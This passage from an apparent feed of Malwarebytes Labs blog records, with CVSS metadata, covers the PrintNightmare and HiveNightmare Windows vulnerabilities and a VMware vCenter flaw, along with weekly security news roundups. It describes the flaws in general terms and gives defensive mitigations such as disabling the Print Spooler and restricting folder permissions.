consequence. A different team of researchers had also found an RCE vulnerability in the Print Spooler service. They called theirs PrintNightmare and believed it was the same as CVE-2021-1675. They were working on a presentation to be held at the Black Hat security conference. But now they feared that the other team had stumbled over the same vulnerability, so they published their work, believing it was covered by the patch already released by Microsoft.\n\nBut the patch for CVE-2021-1675 didn't seem to work against the PrintNightmare vulnerability. It appeared that PrintNightmare and CVE-2021-1675 were in fact two very similar but different vulnerabilities in the Print Spooler.\n\nAnd with that, it looked as if the PrintNightmare team had, unwittingly, disclosed a new 0-day vulnerability irresponsibly. (Disclosure of vulnerabilities is considered responsible if a vendor is given enough time to issue a patch.)\n\nSince then, some security researchers have argued that CVE-2021-1675 and PrintNightmare are the same, and others have reported that the CVE-2021-1675 patch works on _some_ systems.\n\n> [#PrintNightmare](<https://twitter.com/hashtag/PrintNightmare?src=hash&ref_src=twsrc%5Etfw>) / CVE-2021-1675 - It appears patches might be effective on systems that are not domain controllers. RpcAddPrinterDriverEx call as non-admin fails with access denied against fully patched Server 2016 and 2019 non-DC, but after dcpromo the exploit works again. \n![\ud83e\udd37](https://s.w.org/images/core/emoji/13.0.1/72x72/1f937.png) [pic.twitter.com/USetUXUzXN](<https://t.co/USetUXUzXN>)\n> \n> -- Stan Hegt (@StanHacked) [July 1, 2021](<https://twitter.com/StanHacked/status/1410405688766042115?ref_src=twsrc%5Etfw>)\n\nWhether they are the same or not, what is not in doubt is that there are live Windows systems where PrintNightmare cannot be patched. And unfortunately, it seems that the systems where the patch doesn't work are Windows Domain Controllers, which is very much the worst case scenario. \n\n### PrintNightmare\n\nThe Print Spooler service is embedded in the Windows operating system and manages the printing process. It is running by default on most Windows machines, including Active Directory servers.\n\nIt handles preliminary functions of finding and loading the print driver, creating print jobs, and then ultimately printing. This service has been around \u201cforever\u201d and it has been a fruitful hunting ground for vulnerabilities, with many flaws being found and fixed over the years. Remember [Stuxnet](<https://blog.malwarebytes.com/threat-analysis/2013/11/stuxnet-new-light-through-old-windows/>)? Stuxnet also exploited a vulnerability in the Print Spooler service as part of the set of vulnerabilities the worm used to spread.\n\nPrintNightmare can be triggered by an unprivileged user attempting to load a malicious driver remotely. Using the vulnerability, researchers have been able to gain SYSTEM privileges, and achieved remote code execution with the highest privileges on a fully patched system.\n\nTo exploit the flaw, attackers would first have to gain access to a network with a vulnerable machine. Although this provides some measure of protection, it is worth noting that there are underground markets where criminals can purchase this kind of access for a few dollars.\n\nIf they can secure any kind of access, they can potentially use PrintNightmare to turn a normal user into an all-powerful Domain Admin. As a Domain Admin they could then act almost with impunity, spreading ransomware, deleting backups and even disabling security software.\n\n### Mitigation\n\nConsidering the large number of machines that may be vulnerable to PrintNightmare, and that several methods to exploit the vulnerability have been published, it seems likely there will soon be malicious use-cases for this vulnerability.\n\nThere are a few things you can do until the vulnerability is patched. Microsoft will probably try to patch the vulnerability before next patch Tuesday (July 12), but until then you can:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the internet.\n\nI realize the above will not be easy or even feasible in every case. For those machines that need the Print Spooler service and also need to be accessible from outside the LAN, very carefully limit and [monitor](<https://support.malwarebytes.com/hc/en-us/articles/360056829274-Configure-Brute-Force-Protection-in-Malwarebytes-Nebula>) access events and permissions. Also at all costs avoid running the Print Spooler service on any domain controllers.\n\nFor further measures it is good to know that the exploit works by dropping a DLL in a subdirectory under C:\\Windows\\System32\\spool\\drivers, so system administrators can create a \u201cDeny to modify\u201d rule for that directory and its subdirectories so that even the SYSTEM account can not place a new DLL in them.\n\nThis remains a developing situation and we will update this article if more information becomes available.\n\n### Update July 2, 2021\n\nMicrosoft acknowledged this vulnerability and it has been assigned [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). In their description Microsoft also provides an extra workaround besides disabling the Print Spooler service.\n\n**Disable inbound remote printing through Group Policy**\n\nYou can also configure the settings via Group Policy as follows:\n\n * Computer Configuration / Administrative Templates / Printers\n * Disable the \u201cAllow Print Spooler to accept client connections:\u201d policy to block remote attacks.\n\n**Impact of workaround** This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.\n\nThe post [PrintNightmare 0-day can be used to take over Windows domain controllers](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T14:08:26", "type": "malwarebytes", "title": "PrintNightmare 0-day can be used to take over Windows domain controllers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-01T14:08:26", "id": "MALWAREBYTES:DA59FECA8327C8353EA012EA1B957C7E", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-12T12:35:46", "description": "I doubt if there has ever been a more appropriate nickname for a vulnerable service than PrintNightmare. There must be a whole host of people in Redmond having nightmares about the Windows Print Spooler service by now.\n\nPrintNightmare is the name of a set of vulnerabilities that allow a standard user on a Windows network to execute arbitrary code on an affected machine (including domain controllers) as SYSTEM, allowing them to elevate their privileges as far as domain admin. Users trigger the flaw by simply feeding a vulnerable machine a malicious printer driver. The problem was made worse by [confusion](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) around whether PrintNightmare was a known, patched problem or an entirely new problem. In the end it turned out to be a bit of both.\n\n### What happened?\n\nIn June, Microsoft patched a vulnerability in the Windows Print Spooler that was listed as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>). At first it was classified as an elevation of privilege (EoP) vulnerability. Which means that someone with limited access to a system could raise their privilege level, giving them more power over the affected system. This type of vulnerability is serious, especially when it is found in a widely used service like the Windows Print Spooler. A few weeks after the patch Microsoft raised the level of seriousness to a remote code execution (RCE) vulnerability. RCE vulnerabilities allow a malicious actor to execute their code on a different machine on the same network.\n\nIn a rush to be the first to publish a proof-of-concept (PoC), researchers published a write-up and a demo exploit to demonstrate the vulnerability. Only to find out they had alerted the world to a new 0-day vulnerability by accident. This vulnerability listed as [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) was introduced under the name PrintNightmare.\n\nOminously, the researchers behind PrintNightmare predicted that the Print Spooler, which has seen its fair share of problems in the past, would be a fertile ground for further discoveries.\n\nAt the beginning of July, Microsoft issued a set of out-of-band patches to fix this Windows Print Spooler RCE vulnerability. Soon enough, several researchers figured out that local privilege escalation (LPE) still worked. This means that threat actors and already active malware can still exploit the vulnerability to gain SYSTEM privileges. In a demo, [Benjamin Delpy](<https://twitter.com/gentilkiwi>) showed that the update failed to fix vulnerable systems that use certain settings for a feature called Point and Print, which makes it easier for network users to obtain the printer drivers they need.\n\nOn July 13 the Cybersecurity and Infrastructure Security Agency (CISA) issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it became aware of multiple threat actors exploiting PrintNightmare.\n\nAlso in July, [CrowdStrike](<https://www.crowdstrike.com/blog/magniber-ransomware-caught-using-printnightmare-vulnerability/>) identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims.\n\n### An end to the nightmare?\n\nIn the August 10 [Patch Tuesday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>) update, the Print Spooler service was subject to _yet more_ patching, and Microsoft said that this time its patch should address all publicly documented security problems with the service.\n\nIn an unusual breaking change, one part of the update made admin rights required before using the Windows Point and Print feature.\n\n### Just one day later\n\nOn August 11, Microsoft released information about [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>), yet another 0-day that allows local attackers to gain SYSTEM privileges on a computer. Again, it was security researcher Benjamin Delpy who [demonstrated](<https://vimeo.com/581584478>) the vulnerability, showing that threat actors can still gain SYSTEM privileges simply by connecting to a remote print server.\n\n### Mitigation\n\nThe workaround offered by Microsoft is stopping and disabling the Print Spooler service, although at this point you may be seriously considering a revival of the paperless office idea. So:\n\n * Disable the Print Spooler service on machines that do not need it. Please note that stopping the service without disabling may not be enough.\n * For the systems that do need the Print Spooler service to be running make sure they are not exposed to the Internet.\n\nMicrosoft says it is investigating the vulnerability and working on (yet another) security update.\n\nLike I said [yesterday](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/printnightmare-and-rdp-rce-among-major-issues-tackled-by-patch-tuesday/>): To be continued.\n\nThe post [Microsoft's PrintNightmare continues, shrugs off Patch Tuesday fixes](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T11:30:26", "type": "malwarebytes", "title": "Microsoft\u2019s PrintNightmare continues, shrugs off Patch Tuesday fixes", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T11:30:26", "id": "MALWAREBYTES:7F8FC685D6EFDE8FC4909FDA86D496A5", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/microsofts-printnightmare-continues-shrugs-off-patch-tuesday-fixes/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-15T10:37:13", "description": "### Last week on Malwarebytes Labs\n\n * Multiple video games break after [domain name snafu](<https://blog.malwarebytes.com/privacy-2/2021/11/multiple-video-games-break-after-domain-name-snafu/>)\n * How to remove [adware on an Android phone](<https://blog.malwarebytes.com/101/how-tos/2021/11/how-to-remove-adware-on-an-android-phone/>)\n * [Smart TV adverts](<https://blog.malwarebytes.com/privacy-2/2021/11/smart-tv-adverts-put-a-wrinkle-in-your-programming/>) put a wrinkle in your programming\n * Are cybercriminals turning away from the US and [targeting Europe](<https://blog.malwarebytes.com/malwarebytes-news/2021/11/are-cybercriminals-turning-away-from-the-us-and-targeting-europe-instead/>) instead?\n * Patch now! [Microsoft plugs actively exploited zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/11/patch-now-microsoft-plugs-actively-exploited-zero-days-and-other-updates/>) and other updates\n * [Playstation 5 hacked](<https://blog.malwarebytes.com/hacking-2/2021/11/playstation-5-hacked-twice/>)\u2014twice!\n * Murder-for-hire, money laundering, and more: How [organised criminals work online](<https://blog.malwarebytes.com/reports/2021/11/murder-for-hire-money-laundering-and-more-how-organised-criminals-work-online/>)\n * Could Apple\u2019s new MacBooks signal a [change in direction on security](<https://blog.malwarebytes.com/mac/2021/11/do-apples-new-macbooks-signal-a-change-in-direction-on-security/>)?\n * The [importance of backing up](<https://blog.malwarebytes.com/101/2021/11/the-importance-of-backing-up/>)\n * A [multi-stage PowerShell](<https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/>) based attack targets Kazakhstan\n\nOn Malwarebytes' Lock and Code podcast episode S02E21 of this week we talked to Jess Dodson about "[Why we fail at getting the cybersecurity basics right.](<https://blog.malwarebytes.com/podcast/2021/11/why-we-fail-at-getting-the-cybersecurity-basics-right-with-jess-dodson-lock-and-code-s02e21/>)"\n\n### Other cybersecurity news\n\n * Romanian authorities arrested two individuals suspected of cyberattacks deploying the [Sodinokibi/REvil ransomware](<https://www.europol.europa.eu/newsroom/news/five-affiliates-to-sodinokibi/revil-unplugged>). (Source: Europol Newsroom)\n * The TOR project launched a new release:[ Tor Browser 11.0](<https://blog.torproject.org/new-release-tor-browser-11-0>) (Source: The TOR blog)\n * Threat actors are actively exploiting [ZOHO ManageEngine ADSelfService Plus vulnerability](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>) in a targeted campaign. (Source: Microsoft Security blog) \n * [SolarWinds Serv-U vulnerability](<https://blog.fox-it.com/2021/11/08/ta505-exploits-solarwinds-serv-u-vulnerability-cve-2021-35211-for-initial-access/>) is used for initial access in Clop ransomware attacks. (Source: Fox IT)\n * Facebook whistleblower Frances Haugen warned that the [metaverse will gather even more personal information](<https://apnews.com/article/technology-lifestyle-business-only-on-ap-media-e4f03d38243552e46a77d0d3f0d45e3b>). (Source: AP news)\n * The US Treasury Department announced a set of actions focused on [disrupting criminal ransomware actors and virtual currency exchanges](<https://home.treasury.gov/news/press-releases/jy0471>) that launder the proceeds of ransomware. (Source: US Department of the Treasury)\n * A suspected state-sponsored threat actor has used Hong Kong pro-democracy news sites to deploy a [macOS zero-day exploit chain](<https://therecord.media/macos-zero-day-deployed-via-hong-kong-pro-democracy-news-sites/>). (Source: The Record)\n * [Void Balaur hackers-for-hire](<https://www.bleepingcomputer.com/news/security/void-balaur-hackers-for-hire-sell-stolen-mailboxes-and-private-data/>) sell stolen mailboxes and private data. (Source: Bleeping Computer)\n * [Queensland water supplier Sunwater](<https://www.abc.net.au/news/2021-11-11/qld-hackers-target-water-supplier-sunwater-cyber-security-attack/100610400>) targeted by hackers in months-long undetected cybersecurity breach. (Source: ABC.net.au news)\n * Missouri apologizes to 600,000 teachers who had [SSNs and private info exposed](<https://www.zdnet.com/article/missouri-apologizes-to-600k-teachers-who-had-ssns-and-private-info-exposed-offers-credit-monitoring/>). (Source: ZDNet)\n\nStay safe, everyone!\n\nThe post [A week in security (Nov 8 - Nov 14)](<https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-15T10:14:02", "type": "malwarebytes", "title": "A week in security (Nov 8 \u2013 Nov 14)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-15T10:14:02", "id": "MALWAREBYTES:C61940E0E1CB3ACBDD840B3497805A7E", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/11/a-week-in-security-nov-8-nov-14-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig) \nMobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [time to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-31T08:36:55", "description": "Users with low privileges can access sensitive Registry database files on Windows 10 and Windows 11, leaving them vulnerable to a local elevation of privilege vulnerability known as SeriousSAM or HiveNightmare.\n\nDoesn't sound serious? Reassured that users must already have access to the system and be able to execute code on said system to use this vulnerability? Don't be.\n\nUsing SeriousSAM, a user can access multiple system files, including the Security Accounts Manager (SAM) database. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. The attacker would then have full control, which means they can install programs, view, change, or delete data, and create new accounts with full user rights. Which is exactly what an attacker wants.\n\n### My mama said\n\nSAM stands for Security Accounts Manager and it is supposed to be a protected database that can only be accessed by users with Adminstrator privileges. This was designed as such because the database contains the hashed passwords for all users on a system.\n\nNow, I\u2019ve always been taught that anyone with physical access to your system, and enough knowledge, can take it over. One of the reasons why this is true is that the \u201cholder\u201d of the system can dump those sensitive Registry database files _when Windows is not running_. \n\nWhen Windows is not running the registry is not \u201cmounted\u201d and the "access violation" protection is inactive, since to another operating system (OS) they are just files like any other. You can see the caveat there. You need to look at the files from an external OS to pull this off. (I will leave the \u201chow to\u201d do that to your imagination.)\n\nWhile dumping a registry hive from an inactive Windows machine like that may sound daunting to some, and difficult for malware to pull off, SeriousSAM makes it much easier. SeriousSAM removes the need for that external OS, and for Windows to be off, making it a much more achievable trick. It allows users (or malicious programs inadvertently run by those users) to bypass the "access violation" protection on the computer they're using, while it's running.\n\n### Pass the hash\n\n"But the passwords are hashed!", I heard you thinking. In that case, meet pass-the-hash attacks. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client\u2019s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that \u201cmathematical operation\u201d required to gain access. The authentication process does not require the plaintext password. The hash is enough. \n\nSo, _pass the hash_ is the name for a technique that allows an attacker to authenticate to a remote server or service by using the hash of a user's password, instead of requiring the associated plaintext password as is normally the case.\n\n### Made easy\n\nThe vulnerability we have been referring to as SeriousSAM is listed as [CVE-2021-36934](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>) and while it is unclear exactly which versions of Windows are vulnerable, it looks as if some versions of Windows 10 and all versions of Windows 11 are affected, as long as System Protection, aka Shadow Volumes, is enabled. The Microsoft advisory says "\u2026we can confirm that this issue affects Windows 10 version 1809 and newer operating systems". The company is researching the issue and we will update this post once we know more.\n\nThe vulnerability got its other name, HiveNightmare, because it affects registry hives, and as a reference to the recently discovered [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) vulnerabilities in the Windows Print Spooler service. I think it's a better name for this vulnerability because SAM is not the only sensitive Registry database that's affected. Others are all stored in the `%windir%\\system32 \\config` folder, as is SAM. They are SYSTEM, SECURITY, DEFAULT, and SOFTWARE. Which means there might be more options for hackers with limited access to raise privileges or achieve remote code execution waiting to be found.\n\nThe underlying problem is, in Microsoft's own words "overly permissive Access Control Lists (ACLs) on multiple system files". Those lax permissions are carried over into the Shadow copies where the files are unmounted and as unprotected as the files on the dormant computer my mother warned me about. So, any user can dump the database from the Shadow copy and as such create a readable database.\n\nShadow Volumes are enabled by default so that doesn\u2019t bring the number of systems at risk down a lot. It is a useful option, but in this case it is also what enables this vulnerability. \n\n### Mitigation\n\nWhile Microsoft is expected to come up with an out-of-band patch for this vulnerability, there are some things you can do to defeat the vulnerability. Whatever you do to address problem, note that fixing the cause does not necessarily fix broken permissions in shadow copies you have already taken.\n\nYou can find some useful commands for discovering if your systems have Shadow copies enabled, and whether they are vulnerable in the [CERT advisory](<https://www.kb.cert.org/vuls/id/506989>). The advisory notes that "simply having a system drive that is larger that 128GB in size and then performing a Windows Update or installing an MSI will ensure that a VSS shadow copy will be automatically created."\n\nMicrosoft recommends restricting access to the problematic folder and deleting Volume Shadow Copy Service (VSS) shadow copies to mitigate this issue.\n\n**Restrict access to the contents of `%windir%\\system32\\config`**\n\n * Open Command Prompt or Windows PowerShell as an administrator.\n * Run this command: icacls %windir%\\system32\\config\\\\*.* /inheritance:e\n\n**Delete Volume Shadow Copy Service (VSS) shadow copies**\n\n * Delete any System Restore points and Shadow volumes that existed prior to restricting access to `%windir%\\system32\\config`.\n * Create a new System Restore point (if desired).\n\n**Note: Deleting shadow copies could impact restore operations, including the ability to restore data with third-party backup applications.**\n\nThe post [HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but and one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvServer Center is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. It's a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patch immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vServer setup affected by this?\n\nIt depends. Some versions, such as vCenter 